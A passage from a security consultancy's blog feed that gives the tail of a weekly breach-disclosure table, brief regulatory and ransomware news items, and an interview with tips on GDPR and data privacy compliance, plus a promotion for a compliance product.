The Peddie School (New) | Source | Education | USA | Yes | 1.2 TB
Newman Ferrara (New) | Source | Legal | USA | Yes | 835 GB
UNITE HERE (Update) | Source | Professional services | USA | Yes | 791,273
First Professional Services (New) | Source | Healthcare | USA | Yes | 755 GB
BS&B Safety Systems (New) | Source | Manufacturing | USA | Yes | 714.9 GB
Grand Paris Aménagement (New) | Source | Construction | France | Yes | 653.8 GB
Climatech (New) | Source | Manufacturing | USA | Yes | 550 GB
VSP Dental (New) | Source | Healthcare | USA | Yes | 543 GB
Human Resources Technologies (New) | Source | IT services | USA | Yes | 500 GB
Dilweg (New) | Source | Finance | USA | Yes | 453 GB
Spine West (New) | Source | Healthcare | USA | Yes | 450 GB
Wapiti Energy (New) | Source | Energy | USA | Yes | 436.3 GB
Birchall Foodservice (New) | Source | Hospitality | UK | Yes | 405 GB
Zircodata (New) | Source | IT services | Australia | Yes | 395 GB
Wangkanai Group (New) | Source | Manufacturing | Thailand | Yes | 350 GB
Family Health Center (New) | Source | Healthcare | USA | Yes | 327 GB
US Merchants (New) | Source | Manufacturing | USA | Yes | 245 GB
Tangerine (New) | Source | Telecoms | Australia | Yes | 232,000
Remkes Poultry (New) | Source | Manufacturing | Netherlands | Yes | 190 GB
Hardeman County Community Health Center (New) | Source | Healthcare | USA | Yes | 169 GB
CarePro (New) | Source 1; source 2 | Healthcare | USA | Yes | 151,499
Farmacia al Shefa (New) | Source | Healthcare | Romania | Yes | 150 GB
Quik Pawn Shop (New) | Source | Finance | USA | Yes | 140 GB
Bucher and Strauss (New) | Source | Finance | Switzerland | Yes | 140 GB
Prime Healthcare Employee Health Plan (New) | Source 1; source 2 | Healthcare | USA | Yes | 101,135
Apex Internationale Spedition (New) | Source | Transport | Germany | Yes | 100 GB
Bram Auto Group (New) | Source | Manufacturing | USA | Yes | 85 GB
Town of Greater Napanee (New) | Source | Public | Canada | Yes | 82.9 GB
Tiete Automobile (New) | Source | Retail | Brazil | Yes | 68.5 GB
Delia Cosmetics (New) | Source | Manufacturing | Poland | Yes | 64 GB
Rapid Granulator (New) | Source | Manufacturing | Sweden | Yes | 60 GB
medQ, Inc. (New) | Source | Healthcare | USA | Yes | 54,353
Advanced Project Solutions (New) | Source | IT services | USA | Yes | 54 GB
Greater Cincinnati Behavioral Health Services (Update) | Source 1; source 2 | Healthcare | USA | Yes | 50,000
Compression Leasing Services (New) | Source | Manufacturing | USA | Yes | 41.11 GB
Washington County Hospital and Nursing Home (New) | Source | Healthcare | USA | Yes | 31,125
Crossroads Equipment Lease & Finance, LLC (New) | Source | Finance | USA | Yes | 24,182
EdisonLearning, Inc. (New) | Source | Education | USA | Yes | 23,922
DTS (Desarrollo de Tecnologia y Sistemas) (New) | Source | IT services | Chile | Yes | 20 GB
Peer Consultants (New) | Source | Professional services | USA | Yes | 20 GB
Wyze (New) | Source | IT services | USA | Yes | 13,000
Bay Area Heart Center (New) | Source 1; source 2 | Healthcare | USA | Yes | 11,709
Westward360 (New) | Source | Real estate | USA | Yes | 11 GB
Greylock McKinnon Associates, Inc. (New) | Source | Legal | USA | Yes | 5,465
Bacon-Universal Holdings, LLC (New) | Source | Construction | USA | Yes | 3,561
T.Y. Lin International Group Ltd. (New) | Source | Engineering | USA | Yes | 3,398
GC Services (New) | Source | Finance | USA | Yes | 3,043
CVS Pharmacy, Inc. (New) | Source 1; source 2 | Healthcare | USA | Yes | 1,896
Matthews International (New) | Source | Manufacturing | USA | Yes | 1,846
Pond & Company (New) | Source | Engineering | USA | Yes | 1,495
Brazee & Huban CPAs (New) | Source | Finance | USA | Yes | 1,119
BlueCross BlueShield of Tennessee, Inc. and Volunteer State Health Plan, Inc. d/b/a BlueCare Plus Tennessee (New) | Source 1; source 2 | Healthcare | USA | Yes | 790
Roswell Park Comprehensive Cancer Center (New) | Source 1; source 2 | Healthcare | USA | Yes | 755
Capital Health system, Inc. (New) | Source 1; source 2 | Healthcare | USA | Yes | 501
Harris Beach PLLC (New) | Source | Legal | USA | Yes | 486
Beauty Essence, Inc. (New) | Source | Leisure | USA | Yes | 409
Walmart, Inc. (New) | Source | Retail | USA | Yes | 204
Xerox Corporation (New) | Source | Professional services | USA | Yes | 181
HematoLogics, Inc. (New) | Source | Healthcare | USA | Yes | 99
torchbyte (New) | Source | Telecoms | Romania | Yes | 45
Australian Department of Finance (New) | Source | Public | Australia | Yes | Unknown
Anxun Information Technology (New) | Source | Cyber security | China | Yes | Unknown
PSI Software (New) | Source | Software | Germany | Yes | Unknown
Acies SRL (New) | Source | Healthcare | Italy | Yes | Unknown
Grupo Bimbo (New) | Source | Manufacturing | Mexico | Yes | Unknown
Axel Johnson (New) | Source | Manufacturing | Sweden | Yes | Unknown
dasteam ag (New) | Source | Professional services | Switzerland | Yes | Unknown
Acorn Property Group (New) | Source | Construction | UK | Yes | Unknown
Multiple universities using the Janet Network, including Cambridge and Manchester (New) | Source | Education | UK | Yes | Unknown
Helical Technology (New) | Source | Manufacturing | UK | Yes | Unknown
The Chas. E. Phipps Co (New) | Source | Construction | USA | Yes | Unknown
FixedFloat (New) | Source | Crypto | USA | Yes | Unknown
Aeromech (New) | Source | Engineering | USA | Yes | Unknown
Bradshaw Medical (intech) (New) | Source | Healthcare | USA | Yes | Unknown
Maryville Addiction Treatment Center (New) | Source 1; source 2 | Healthcare | USA | Yes | Unknown
Radiology Associates of Ocala (New) | Source | Healthcare | USA | Yes | Unknown
Infiniti USA (New) | Source | Manufacturing | USA | Yes | Unknown
Pressco Technology (New) | Source | Manufacturing | USA | Yes | Unknown
Welch’s (New) | Source | Manufacturing | USA | Yes | Unknown
C&J Industries (New) | Source | Professional services | USA | Yes | Unknown
Carl Fischer Music Publishing (New) | Source | Retail | USA | Yes | Unknown
Lancaster (New) | Source | Retail | USA | Yes | Unknown
U-Haul (New) | Source | Retail | USA | Yes | Unknown
Andfla (New) | Source | Agriculture | Romania | Unknown | Unknown
CRB Group (New) | Source | Construction | USA | Unknown | Unknown
KHS&S Contractors (New) | Source | Construction | USA | Unknown | Unknown
Dunaway (New) | Source | Engineering | USA | Unknown | Unknown
Change Healthcare (New) | Source | Healthcare | USA | Unknown | Unknown
Ernest Health (New) | Source | Healthcare | USA | Unknown | Unknown
National Dentex Labs (New) | Source | Healthcare | USA | Unknown | Unknown
Silgan Holdings (New) | Source | Manufacturing | USA | Unknown | Unknown

Note 1: ‘New’/‘Update’ in the first column refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all.


Enforcement

ICO orders leisure centre to stop using facial recognition technology to monitor staff

The ICO (Information Commissioner’s Office) has ordered Serco Leisure and several associated community leisure trusts to stop using facial recognition technology to monitor employee attendance as this is “neither fair nor proportionate under data protection law”, according to the UK Information Commissioner.

On the same day the ICO issued this enforcement notice, it published new guidance for using biometric data.

New US Executive Order issued to strengthen US port security

The Biden-Harris administration is issuing an Executive Order to strengthen the security of US ports. Cyber incidents that endanger “any vessel, harbor, port, or waterfront facility” must be reported. The US Coast Guard is also given the authority to respond to “malicious cyber activity”.


Other news

LockBit ransomware group recovers from law enforcement disruption

Last week, we reported that law enforcers disrupted the LockBit ransomware group. Four days later, the group recovered. Its blog has now reappeared, as well as a leak page containing folders for “dozens” of victims.

NSA announces retirement of director of cyber security

The US NSA (National Security Agency) has announced the retirement of its director of cyber security, Rob Joyce. He’ll be succeeded by David Luber.


Key date

31 March 2024 – PCI DSS v4.0 transitioning deadline 

Version 3.2.1 of the PCI DSS (Payment Card Industry Data Security Standard) is being retired on 31 March, to be replaced by version 4.0 of the Standard. There are more than 50 new requirements in PCI DSS v4.0. You can find out more about them on the PCI Security Standards Council’s website.


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week with the biggest and most interesting news stories, all rounded up in one place.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The post The Week in Cyber Security and Data Privacy: 19 – 25 February 2024 appeared first on IT Governance UK Blog.

Maintaining GDPR and Data Privacy Compliance in 2024
https://www.itgovernance.co.uk/blog/maintaining-gdpr-and-data-privacy-compliance-in-2024
Fri, 16 Feb 2024 10:55:04 +0000
Expert tips from Alan Calder

Alan is the Group CEO of GRC International Group PLC, the parent company of IT Governance, and is an acknowledged international security guru.

He’s also an award-winning author, and has been involved in developing a wide range of information security and data privacy training courses, has consulted for clients across the globe, and is a regular media commentator and speaker.

We sat down to chat to him about industry challenges in 2024.


There are still more than ten months to go in 2024. What challenges do you think we’ll see before the year ends?

For a start, maintaining data privacy and GDPR [General Data Protection Regulation] compliance will become increasingly complex through 2024, particularly for organisations operating across multiple jurisdictions.

GDPR enforcement within the EU, combined with the EU-US data privacy framework and the planned changes to the UK GDPR, all bring challenges in terms of keeping on top of what must be done.

In addition, 14 US states now have their own data privacy laws, and GDPR-like legislation has proliferated across the world.

The volume of cyber security and cyber resilience legislation is also surging, alongside these privacy laws, which have additional – and significant – implications for how organisations address their data privacy obligations.

About that “GDPR-like legislation”, could you please elaborate?

The GDPR is acknowledged around the world as a ‘gold standard’ when it comes to data privacy legislation, affording personal data a level of protection largely unmatched elsewhere – certainly in 2016, when the GDPR was first published in its final form.

Since then, we’ve seen many more laws like it emerge, including California’s CPRA [California Privacy Rights Act], Brazil’s LGPD [General Personal Data Protection Law] and Japan’s APPI [Act on the Protection of Personal Information].

This isn’t too surprising, considering the high standard set by the EU GDPR, paired with the fact that the Regulation itself applies beyond the EEA:

  • To personal data processing carried out on behalf of data controllers or processors in the EU;
  • To the processing of EU residents’ personal data in relation to offering them goods or services, or in relation to monitoring their behaviour; and
  • Where EU member state law applies by virtue of public international law.

What are your top tips for ensuring compliance with the GDPR and similar laws?

Management in all organisations should consider the following five points:

  1. Review your privacy notice – ensure that it’s up to date and reflects the jurisdictions you’re processing personal data in. If you’re transparent about what you’re doing with people’s data, you’re less likely to be challenged about your overall compliance and compliance strategy.
  2. Check your marketing opt-out mechanisms – ensure that these all work as they should and that, internally, you’re clear about the lawful grounds on which you contact people. If you’re careful about compliance in your marketing activities, you’re less likely to trigger a complaint that might lead to a fuller investigation. Even that aside, the ICO [Information Commissioner’s Office] has been strict on its PECR [Privacy and Electronic Communications Regulations] enforcement, certainly where unsolicited marketing is concerned.
  3. Map your data flows – make sure you know 1) what data is going where, including subcontractors, service providers and supporting software systems; 2) who has access to that data; and 3) how it is protected. This ensures you can identify relevant legal obligations, as well as assess and improve data security measures.
  4. Review your data protection measures – make sure they’re up to the task: Cyber Essentials and anti-phishing training are simple measures that go a long way towards keeping you out of trouble. Penetration testing is also well worth the investment.
  5. Look for a compliance platform that enables you to cost-effectively cross-map the various regulatory requirements, identify relevant controls, and generate the necessary policies, procedures and other documentation.

This combination of activities should be enough to keep organisations out of trouble. After all, if you don’t give data subjects grounds to complain, and you avoid a security breach, you’re unlikely to find yourself managing the consequences of breaching the GDPR.


CyberComply

This cloud-based, end-to-end solution simplifies compliance with a range of data privacy and cyber security laws and standards, including the GDPR:

  • Manage all your cyber security and data privacy obligations in one place.
  • Get immediate visibility of critical data and key performance indicators.
  • Stay ahead of regulatory changes with our scalable compliance solution.
  • Reduce errors and improve the completeness of your risk management processes.
  • Identify and treat privacy and security risks before they become critical concerns.

To find out more about this platform, read our interview with Sam McNicholls-Novoa, the product marketing manager for CyberComply, or try it yourself with our free 30-day trial.


We hope you enjoyed this week’s edition of our ‘Expert Insight’ series. We’ll be back next week, chatting to another expert within the Group.

In the meantime, if you missed it, check out last week’s blog, where senior penetration tester Leon Teale gave us his expert insights into the CVSS (Common Vulnerability Scoring System).


The post Maintaining GDPR and Data Privacy Compliance in 2024 appeared first on IT Governance UK Blog.
